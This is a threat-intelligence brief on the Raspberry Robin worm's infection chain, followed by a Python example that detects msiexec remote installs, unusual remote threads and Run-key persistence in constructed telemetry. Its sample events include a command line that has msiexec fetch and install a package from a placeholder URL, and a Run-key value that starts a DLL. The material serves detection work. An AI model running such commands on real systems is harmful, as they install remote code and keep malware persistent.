Researchers Found Infection Chain in USB Devices and Shared Folders
Industry: N/A | Level: Tactical | Source: Cybereason
Cybereason shared an infection chain involving Raspberry Robin, a malware worm that is often distributed through infected USB devices or shared folders. Although the worm is commonly observed infecting victims through Microsoft shortcut (LNK) files, the delivery method has varied "through file archives, removable devices (USB) or ISO files." The LNK file calls the Windows command shell to spawn msiexec.exe, which proxies the download of a malicious DLL. To maintain stealth, the malware injects itself into three processes, typically rundll32.exe, regsvr32.exe, and dllhost.exe. Persistence is established through a registry Run key.
Anvilogic Scenario:
- Raspberry Robin Abuses MsiExec
Anvilogic Use Cases:
- Compressed File Execution
- Symbolic OR Hard File Link Created
- Msiexec Abuse
- Rare Remote Thread
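The following is an added example, not code from Cybereason or Anvilogic, showing how three of the detection points in the chain above (msiexec.exe fetching a package from a URL with a command-shell parent, a remote thread landing in rundll32.exe/regsvr32.exe/dllhost.exe from a source not in the environment's baseline, and a value written under a registry Run key) can be checked against process-creation, remote-thread and registry-set telemetry. The event field names are Sysmon-style assumptions, the baseline of known-benign remote-thread sources is hypothetical, and the sample events are constructed for the example.

```python
"""Detection logic for the Raspberry Robin chain, run over constructed Sysmon-style events.
Added example; field names and the remote-thread baseline are assumptions, not the vendor's schema."""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set

# Processes the write-up names as injection targets.
INJECTION_TARGETS = {"rundll32.exe", "regsvr32.exe", "dllhost.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
RUN_KEY_RE = re.compile(r"\\currentversion\\run(once)?\\", re.IGNORECASE)


@dataclass
class Event:
    kind: str                 # "process_create", "remote_thread" or "registry_set"
    image: str = ""           # acting process
    parent_image: str = ""    # parent of the acting process (process_create only)
    command_line: str = ""
    target_image: str = ""    # process receiving the thread (remote_thread only)
    target_object: str = ""   # registry path written (registry_set only)
    details: str = ""         # registry value data (registry_set only)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Constructed sample telemetry: one benign local MSI install, then the described chain.
SAMPLE_EVENTS: List[Event] = [
    Event("process_create", image=r"C:\Windows\System32\msiexec.exe",
          parent_image=r"C:\Windows\explorer.exe",
          command_line=r'msiexec.exe /i "C:\Users\u\Downloads\tool.msi" /qn'),
    Event("process_create", image=r"C:\Windows\System32\cmd.exe",
          parent_image=r"C:\Windows\explorer.exe",
          command_line=r"cmd.exe /r msiexec /q /i http://example.invalid/pkg.msi"),
    Event("process_create", image=r"C:\Windows\System32\msiexec.exe",
          parent_image=r"C:\Windows\System32\cmd.exe",
          command_line=r"msiexec /q /i http://example.invalid/pkg.msi"),
    Event("remote_thread", image=r"C:\Windows\System32\msiexec.exe",
          target_image=r"C:\Windows\System32\rundll32.exe"),
    Event("remote_thread", image=r"C:\Windows\System32\csrss.exe",
          target_image=r"C:\Windows\System32\dllhost.exe"),
    Event("registry_set", image=r"C:\Windows\System32\rundll32.exe",
          target_object=r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
          details=r"rundll32.exe C:\ProgramData\x.dll,entry"),
]

# Hypothetical per-environment baseline of processes that routinely create remote threads.
BASELINE_THREAD_SOURCES: Set[str] = {"csrss.exe"}


def detect_msiexec_remote_install(events: Iterable[Event]) -> List[Dict[str, str]]:
    """Msiexec Abuse: msiexec.exe installing from a URL, i.e. acting as a download proxy.
    A command-shell parent (the LNK -> cmd -> msiexec sequence) raises the severity."""
    hits = []
    for e in events:
        if e.kind != "process_create" or basename(e.image) != "msiexec.exe":
            continue
        if not URL_RE.search(e.command_line):
            continue
        severity = "high" if basename(e.parent_image) == "cmd.exe" else "medium"
        hits.append({"rule": "msiexec_remote_install", "severity": severity,
                     "parent": basename(e.parent_image), "cmd": e.command_line})
    return hits


def detect_rare_remote_thread(events: Iterable[Event], baseline: Set[str]) -> List[Dict[str, str]]:
    """Rare Remote Thread: a thread created in one of the injection targets by a source
    image that is not in the environment's baseline of known remote-thread creators."""
    hits = []
    for e in events:
        if e.kind != "remote_thread" or basename(e.target_image) not in INJECTION_TARGETS:
            continue
        src = basename(e.image)
        if src in baseline:
            continue
        hits.append({"rule": "rare_remote_thread", "source": src, "target": basename(e.target_image)})
    return hits


def detect_run_key_persistence(events: Iterable[Event]) -> List[Dict[str, object]]:
    """Registry Run key written; flag when the value data launches a DLL via rundll32/regsvr32,
    which matches the DLL-based chain described above."""
    hits = []
    for e in events:
        if e.kind != "registry_set" or not RUN_KEY_RE.search(e.target_object):
            continue
        loader = basename(e.details.split()[0]) if e.details else ""
        hits.append({"rule": "run_key_persistence", "writer": basename(e.image),
                     "key": e.target_object, "dll_loader": loader in {"rundll32.exe", "regsvr32.exe"}})
    return hits


def triage(events: List[Event], baseline: Set[str]) -> Dict[str, int]:
    """Count of hits per rule, the summary an analyst would pivot from."""
    return {"msiexec_remote_install": len(detect_msiexec_remote_install(events)),
            "rare_remote_thread": len(detect_rare_remote_thread(events, baseline)),
            "run_key_persistence": len(detect_run_key_persistence(events))}


if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS, BASELINE_THREAD_SOURCES))
```

The benign local install and the baselined csrss.exe thread produce no hits, so the three rules together reconstruct the chain from one msiexec URL install (high, because its parent is cmd.exe), one unexplained thread into rundll32.exe, and one Run-key value that starts a DLL through rundll32.exe.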